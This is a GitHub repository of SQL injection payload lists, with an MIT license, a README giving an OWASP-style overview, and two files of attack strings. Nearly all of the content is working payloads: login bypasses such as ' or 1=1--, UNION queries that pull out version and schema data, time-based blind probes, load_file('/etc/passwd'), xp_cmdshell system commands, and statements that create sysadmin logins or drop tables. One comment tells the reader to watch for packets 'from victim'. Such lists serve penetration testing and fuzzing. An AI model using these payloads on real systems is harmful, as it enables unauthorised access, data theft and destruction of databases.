├── LICENSE ├── README.md ├── SQL-Auth-Bypass.txt └── SQL-Inj-Payload.txt /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Omur UGUR 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |
3 |

SQL Injection Vulnerability Payload List

4 |

5 | 6 | 7 | 8 | 9 |

10 | 11 | 12 | Donate using Liberapay 13 | 14 | 15 | 16 | 17 | Overview: 18 | 19 | A SQL injection attack consists of the insertion or "injection" of a SQL query 20 | via the input data from the client to the application. A successful SQL injection exploit 21 | can read sensitive data from the database, modify database data (Insert/Update/Delete), 22 | execute administration operations on the database (such as shutting down the DBMS), recover the content of a 23 | given file present on the DBMS file system and, in some cases, issue commands to the operating system. 24 | SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order 25 | to affect the execution of predefined SQL commands. The underlying flaw is that the application builds the SQL statement by concatenating client input into it; binding that input as parameters of a prepared statement keeps it as data and removes the injection point. 26 | 27 |

References

28 | 29 | 30 | • SQL Injection 👉 https://www.owasp.org/index.php/SQL_Injection 31 | 32 | 33 |

Download

34 | 35 |
Cloning an Existing Repository ( Clone with HTTPS )
36 |

37 | root@slife:~# git clone https://github.com/omurugur/SQL_Injection_Payload.git
38 | 
39 |
Cloning an Existing Repository ( Clone with SSH )
40 |

41 | root@slife:~# git clone git@github.com:omurugur/SQL_Injection_Payload.git
42 | 
43 | 44 | 45 |

Contact

46 | 47 |
Mail : omurugur12@gmail.com
48 | 49 |
Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
50 | 51 |
GitHub : https://github.com/omurugur
52 | 53 |
Twitter : https://twitter.com/omurugurrr
54 | 55 |
Medium : https://omurugur.medium.com/
56 | 57 |
Donate!
58 |

59 | Support the authors: 60 | -------------------------------------------------------------------------------- /SQL-Auth-Bypass.txt: -------------------------------------------------------------------------------- 1 | '-' 2 | ' ' 3 | '&' 4 | '^' 5 | '*' 6 | ' or ''-' 7 | ' or '' ' 8 | ' or ''&' 9 | ' or ''^' 10 | ' or ''*' 11 | "-" 12 | " " 13 | "&" 14 | "^" 15 | "*" 16 | " or ""-" 17 | " or "" " 18 | " or ""&" 19 | " or ""^" 20 | " or ""*" 21 | or true-- 22 | " or true-- 23 | ' or true-- 24 | ") or true-- 25 | ') or true-- 26 | ' or 'x'='x 27 | ') or ('x')=('x 28 | ')) or (('x'))=(('x 29 | " or "x"="x 30 | ") or ("x")=("x 31 | ")) or (("x"))=(("x 32 | or 1=1 33 | or 1=1-- 34 | or 1=1# 35 | or 1=1/* 36 | admin' -- 37 | admin' # 38 | admin'/* 39 | admin' or '1'='1 40 | admin' or '1'='1'-- 41 | admin' or '1'='1'# 42 | admin' or '1'='1'/* 43 | admin'or 1=1 or ''=' 44 | admin' or 1=1 45 | admin' or 1=1-- 46 | admin' or 1=1# 47 | admin' or 1=1/* 48 | admin') or ('1'='1 49 | admin') or ('1'='1'-- 50 | admin') or ('1'='1'# 51 | admin') or ('1'='1'/* 52 | admin') or '1'='1 53 | admin') or '1'='1'-- 54 | admin') or '1'='1'# 55 | admin') or '1'='1'/* 56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 57 | admin" -- 58 | admin" # 59 | admin"/* 60 | admin" or "1"="1 61 | admin" or "1"="1"-- 62 | admin" or "1"="1"# 63 | admin" or "1"="1"/* 64 | admin"or 1=1 or ""=" 65 | admin" or 1=1 66 | admin" or 1=1-- 67 | admin" or 1=1# 68 | admin" or 1=1/* 69 | admin") or ("1"="1 70 | admin") or ("1"="1"-- 71 | admin") or ("1"="1"# 72 | admin") or ("1"="1"/* 73 | admin") or "1"="1 74 | admin") or "1"="1"-- 75 | admin") or "1"="1"# 76 | admin") or "1"="1"/* 77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 78 | == 79 | = 80 | ' 81 | ' -- 82 | ' # 83 | ' – 84 | '-- 85 | '/* 86 | '# 87 | " -- 88 | " # 89 | "/* 90 | ' and 1='1 91 | ' and a='a 92 | or 1=1 93 | or true 94 | ' or ''=' 95 | " or ""=" 96 | 1′) and '1′='1– 97 | ' AND 1=0 
UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 98 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 99 | and 1=1 100 | and 1=1– 101 | ' and 'one'='one 102 | ' and 'one'='one– 103 | ' group by password having 1=1-- 104 | ' group by userid having 1=1-- 105 | ' group by username having 1=1-- 106 | like '%' 107 | or 0=0 -- 108 | or 0=0 # 109 | or 0=0 – 110 | ' or 0=0 # 111 | ' or 0=0 -- 112 | ' or 0=0 # 113 | ' or 0=0 – 114 | " or 0=0 -- 115 | " or 0=0 # 116 | " or 0=0 – 117 | %' or '0'='0 118 | or 1=1 119 | or 1=1-- 120 | or 1=1/* 121 | or 1=1# 122 | or 1=1– 123 | ' or 1=1-- 124 | ' or '1'='1 125 | ' or '1'='1'-- 126 | ' or '1'='1'/* 127 | ' or '1'='1'# 128 | ' or '1′='1 129 | ' or 1=1 130 | ' or 1=1 -- 131 | ' or 1=1 – 132 | ' or 1=1-- 133 | ' or 1=1;# 134 | ' or 1=1/* 135 | ' or 1=1# 136 | ' or 1=1– 137 | ') or '1'='1 138 | ') or '1'='1-- 139 | ') or '1'='1'-- 140 | ') or '1'='1'/* 141 | ') or '1'='1'# 142 | ') or ('1'='1 143 | ') or ('1'='1-- 144 | ') or ('1'='1'-- 145 | ') or ('1'='1'/* 146 | ') or ('1'='1'# 147 | 'or'1=1 148 | 'or'1=1′ 149 | " or "1"="1 150 | " or "1"="1"-- 151 | " or "1"="1"/* 152 | " or "1"="1"# 153 | " or 1=1 154 | " or 1=1 -- 155 | " or 1=1 – 156 | " or 1=1-- 157 | " or 1=1/* 158 | " or 1=1# 159 | " or 1=1– 160 | ") or "1"="1 161 | ") or "1"="1"-- 162 | ") or "1"="1"/* 163 | ") or "1"="1"# 164 | ") or ("1"="1 165 | ") or ("1"="1"-- 166 | ") or ("1"="1"/* 167 | ") or ("1"="1"# 168 | ) or '1′='1– 169 | ) or ('1′='1– 170 | ' or 1=1 LIMIT 1;# 171 | 'or 1=1 or ''=' 172 | "or 1=1 or ""=" 173 | ' or 'a'='a 174 | ' or a=a-- 175 | ' or a=a– 176 | ') or ('a'='a 177 | " or "a"="a 178 | ") or ("a"="a 179 | ') or ('a'='a and hi") or ("a"="a 180 | ' or 'one'='one 181 | ' or 'one'='one– 182 | ' or uid like '% 183 | ' or uname like '% 184 | ' or userid like '% 185 | ' or user like '% 186 | ' or username like '% 187 | ' or 'x'='x 188 | ') or ('x'='x 189 | " or "x"="x 190 | ' OR 'x'='x'#; 191 | '=' 'or' and '=' 'or' 192 | ' UNION ALL 
SELECT 1, @@version;# 193 | ' UNION ALL SELECT system_user(),user();# 194 | ' UNION select table_schema,table_name FROM information_Schema.tables;# 195 | admin' and substring(password/text(),1,1)='7 196 | ' and substring(password/text(),1,1)='7 197 | -------------------------------------------------------------------------------- /SQL-Inj-Payload.txt: -------------------------------------------------------------------------------- 1 | # ms-sqli info disclosure payload fuzzfile 2 | # replace regex with your fuzzer for best results 3 | # run wireshark or tcpdump, look for incoming smb or icmp packets from victim 4 | # might need to terminate payloads with ;-- 5 | select @@version 6 | select @@servernamee 7 | select @@microsoftversione 8 | select * from master..sysserverse 9 | select * from sysusers 10 | exec master..xp_cmdshell 'ipconfig+/all' 11 | exec master..xp_cmdshell 'net+view' 12 | exec master..xp_cmdshell 'net+users' 13 | exec master..xp_cmdshell 'ping+' 14 | BACKUP database master to disks='\\\\backupdb.dat' 15 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"-- 16 | # you will need to customize/modify some of the vaules in the queries for best effect 17 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 18 | 'create user name identified by 'pass123' -- 19 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 20 | ' ; drop table temp -- 21 | 'exec sp_addlogin 'name' , 'password' -- 22 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 23 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 24 | ' grant connect to name; grant resource to name; -- 25 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 26 | ' or 1=1 -- 27 | ' union (select @@version) -- 28 | ' union 
(select NULL, (select @@version)) -- 29 | ' union (select NULL, NULL, (select @@version)) -- 30 | ' union (select NULL, NULL, NULL, (select @@version)) -- 31 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 32 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 33 | 1'1 34 | 1 exec sp_ (or exec xp_) 35 | 1 and 1=1 36 | 1' and 1=(select count(*) from tablenames); -- 37 | 1 or 1=1 38 | 1' or '1'='1 39 | 40 | )%20or%20('x'='x 41 | %20or%201=1 42 | ; execute immediate 'sel' || 'ect us' || 'er' 43 | benchmark(10000000,MD5(1))# 44 | update 45 | ";waitfor delay '0:0:__TIME__'-- 46 | 1) or pg_sleep(__TIME__)-- 47 | ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 48 | "hi"") or (""a""=""a" 49 | delete 50 | like 51 | " or sleep(__TIME__)# 52 | pg_sleep(__TIME__)-- 53 | *(|(objectclass=*)) 54 | declare @q nvarchar (200) 0x730065006c00650063 ... 55 | or 0=0 # 56 | insert 57 | 1) or sleep(__TIME__)# 58 | ) or ('a'='a 59 | ; exec xp_regread 60 | *| 61 | @var select @var as var into temp end -- 62 | 1)) or benchmark(10000000,MD5(1))# 63 | asc 64 | (||6) 65 | "a"" or 3=3--" 66 | " or benchmark(10000000,MD5(1))# 67 | # from wapiti 68 | or 0=0 -- 69 | 1 waitfor delay '0:0:10'-- 70 | or 'a'='a 71 | hi or 1=1 --" 72 | or a = a 73 | UNION ALL SELECT 74 | ) or sleep(__TIME__)=' 75 | )) or benchmark(10000000,MD5(1))# 76 | hi' or 'a'='a 77 | 0 78 | 21 % 79 | limit 80 | or 1=1 81 | or 2 > 1 82 | ")) or benchmark(10000000,MD5(1))# 83 | PRINT 84 | hi') or ('a'='a 85 | or 3=3 86 | ));waitfor delay '0:0:__TIME__'-- 87 | a' waitfor delay '0:0:10'-- 88 | 1;(load_file(char(47,101,116,99,47,112,97,115, ... 89 | or%201=1 90 | 1 or sleep(__TIME__)# 91 | or 1=1 92 | and 1 in (select var from temp)-- 93 | or '7659'='7659 94 | or 'text' = n'text' 95 | -- 96 | or 1=1 or ''=' 97 | declare @s varchar (200) select @s = 0x73656c6 ... 
98 | exec xp 99 | ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 100 | 3.10E+17 101 | " or pg_sleep(__TIME__)-- 102 | x' AND email IS NULL; -- 103 | & 104 | admin' or ' 105 | or 'unusual' = 'unusual' 106 | // 107 | truncate 108 | 1) or benchmark(10000000,MD5(1))# 109 | \x27UNION SELECT 110 | declare @s varchar(200) select @s = 0x77616974 ... 111 | tz_offset 112 | sqlvuln 113 | "));waitfor delay '0:0:__TIME__'-- 114 | ||6 115 | or%201=1 -- 116 | %2A%28%7C%28objectclass%3D%2A%29%29 117 | or a=a 118 | ) union select * from information_schema.tables; 119 | PRINT @@variable 120 | or isNULL(1/0) /* 121 | 26 % 122 | " or "a"="a 123 | (sqlvuln) 124 | x' AND members.email IS NULL; -- 125 | or 1=1-- 126 | and 1=( if((load_file(char(110,46,101,120,11 ... 127 | 0x770061006900740066006F0072002000640065006C00 ... 128 | %20'sleep%2050' 129 | as 130 | 1)) or pg_sleep(__TIME__)-- 131 | /**/or/**/1/**/=/**/1 132 | union all select @@version-- 133 | ,@variable 134 | (sqlattempt2) 135 | or (EXISTS) 136 | t'exec master..xp_cmdshell 'nslookup www.googl ... 137 | %20$(sleep%2050) 138 | 1 or benchmark(10000000,MD5(1))# 139 | %20or%20''=' 140 | ||UTL_HTTP.REQUEST 141 | or pg_sleep(__TIME__)-- 142 | hi' or 'x'='x'; 143 | ") or sleep(__TIME__)=" 144 | or 'whatever' in ('whatever') 145 | ; begin declare @var varchar(8000) set @var=' ... 146 | union select 1,load_file('/etc/passwd'),1,1,1; 147 | 0x77616974666F722064656C61792027303A303A313027 ... 148 | exec(@s) 149 | ) or pg_sleep(__TIME__)-- 150 | union select 151 | or sleep(__TIME__)# 152 | select * from information_schema.tables-- 153 | a' or 1=1-- 154 | a' or 'a' = 'a 155 | declare @s varchar(22) select @s = 156 | or 2 between 1 and 3 157 | or a=a-- 158 | or '1'='1 159 | | 160 | or sleep(__TIME__)=' 161 | or 1 --' 162 | or 0=0 #" 163 | having 164 | a' 165 | " or isNULL(1/0) /* 166 | declare @s varchar (8000) select @s = 0x73656c ... 
167 | ‘ or 1=1 -- 168 | char%4039%41%2b%40SELECT 169 | order by 170 | bfilename 171 | having 1=1-- 172 | ) or benchmark(10000000,MD5(1))# 173 | or username like char(37); 174 | ;waitfor delay '0:0:__TIME__'-- 175 | " or 1=1-- 176 | x' AND userid IS NULL; -- 177 | */* 178 | or 'text' > 't' 179 | (select top 1 180 | or benchmark(10000000,MD5(1))# 181 | ");waitfor delay '0:0:__TIME__'-- 182 | a' or 3=3-- 183 | -- &password= 184 | group by userid having 1=1-- 185 | or ''=' 186 | ; exec master..xp_cmdshell 187 | %20or%20x=x 188 | select 189 | ")) or sleep(__TIME__)=" 190 | 0x730065006c0065006300740020004000400076006500 ... 191 | hi' or 1=1 -- 192 | ") or pg_sleep(__TIME__)-- 193 | %20or%20'x'='x 194 | or 'something' = 'some'+'thing' 195 | exec sp 196 | 29 % 197 | ( 198 | ý or 1=1 -- 199 | 1 or pg_sleep(__TIME__)-- 200 | 0 or 1=1 201 | ) or (a=a 202 | uni/**/on sel/**/ect 203 | replace 204 | %27%20or%201=1 205 | )) or pg_sleep(__TIME__)-- 206 | %7C 207 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 208 | '%20OR 209 | ; or '1'='1' 210 | declare @q nvarchar (200) select @q = 0x770061 ... 211 | 1 or 1=1 212 | ; exec ('sel' + 'ect us' + 'er') 213 | 23 OR 1=1 214 | / 215 | anything' OR 'x'='x 216 | declare @q nvarchar (4000) select @q = 217 | or 0=0 -- 218 | desc 219 | ||'6 220 | ) 221 | 1)) or sleep(__TIME__)# 222 | or 0=0 # 223 | select name from syscolumns where id = (sele ... 224 | hi or a=a 225 | *(|(mail=*)) 226 | password:*/=1-- 227 | distinct 228 | );waitfor delay '0:0:__TIME__'-- 229 | to_timestamp_tz 230 | ") or benchmark(10000000,MD5(1))# 231 | UNION SELECT 232 | %2A%28%7C%28mail%3D%2A%29%29 233 | +sqlvuln 234 | or 1=1 /* 235 | )) or sleep(__TIME__)=' 236 | or 1=1 or ""= 237 | or 1 in (select @@version)-- 238 | sqlvuln; 239 | union select * from users where login = char ... 240 | x' or 1=1 or 'x'='y 241 | 28 % 242 | ‘ or 3=3 -- 243 | @variable 244 | or '1'='1'-- 245 | "a"" or 1=1--" 246 | //* 247 | %2A%7C 248 | " or 0=0 -- 249 | ")) or pg_sleep(__TIME__)-- 250 | ? 
251 | or 1/* 252 | ! 253 | ' 254 | or a = a 255 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 256 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 257 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 258 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 259 | ' or 1=1 260 |  or 1=1 -- 261 | x' OR full_name LIKE '%Bob% 262 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 263 | '%20or%20''=' 264 | '%20or%20'x'='x 265 | ')%20or%20('x'='x 266 | ' or 0=0 -- 267 | ' or 0=0 # 268 | or 0=0 #" 269 | ' or 1=1-- 270 | ' or '1'='1'-- 271 | ' or 1 --' 272 | or 1=1-- 273 | ' or 1=1 or ''=' 274 | or 1=1 or ""= 275 | ' or a=a-- 276 | or a=a 277 | ') or ('a'='a 278 | 'hi' or 'x'='x'; 279 | or 280 | procedure 281 | handler 282 | ' or username like '% 283 | ' or uname like '% 284 | ' or userid like '% 285 | ' or uid like '% 286 | ' or user like '% 287 | '; exec master..xp_cmdshell 288 | '; exec xp_regread 289 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 290 | --sp_password 291 | ' UNION SELECT 292 | ' UNION ALL SELECT 293 | ' or (EXISTS) 294 | ' (select top 1 295 | '||UTL_HTTP.REQUEST 296 | 1;SELECT%20* 297 | <>"'%;)(&+ 298 | '%20or%201=1 299 | 'sqlattempt1 300 | %28 301 | %29 302 | %26 303 | %21 304 | ' or ''=' 305 | ' or 3=3 306 |  or 3=3 -- 307 | --------------------------------------------------------------------------------